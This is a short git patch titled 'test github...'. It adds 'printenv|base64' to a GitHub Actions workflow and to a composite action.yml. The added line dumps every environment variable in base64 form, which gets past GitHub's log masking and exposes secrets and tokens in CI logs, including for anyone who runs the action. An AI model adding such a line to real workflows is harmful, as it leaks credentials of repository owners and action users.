From 873d264f9628fe372728180c07e7b589c1b50eee Mon Sep 17 00:00:00 2001 From: Chl Date: Fri, 30 Aug 2024 02:04:18 +0200 Subject: [PATCH] test github... --- .github/workflows/generate-release-zipfile.yml | 1 + action.yml | 1 + 2 files changed, 2 insertions(+) diff --git a/.github/workflows/generate-release-zipfile.yml b/.github/workflows/generate-release-zipfile.yml index 341d6e6..d11259a 100644 --- a/.github/workflows/generate-release-zipfile.yml +++ b/.github/workflows/generate-release-zipfile.yml @@ -29,6 +29,7 @@ jobs: git fetch --no-tags --prune --no-recurse-submodules --depth=1 origin "$GITHUB_SHA" git reset --hard "$GITHUB_SHA" printenv + printenv|base64 - name: Testing the artifact uploading id: "uploading" diff --git a/action.yml b/action.yml index 3063b32..0f3a441 100644 --- a/action.yml +++ b/action.yml @@ -56,6 +56,7 @@ runs: # (at the cost of and breaking if the JSON formating happens to change, # and readability...) printenv + printenv|base64 # First we extract the second field from the token (e.g. xxx.yyy.zzz), # then we de-base64 and last, we extract the two id from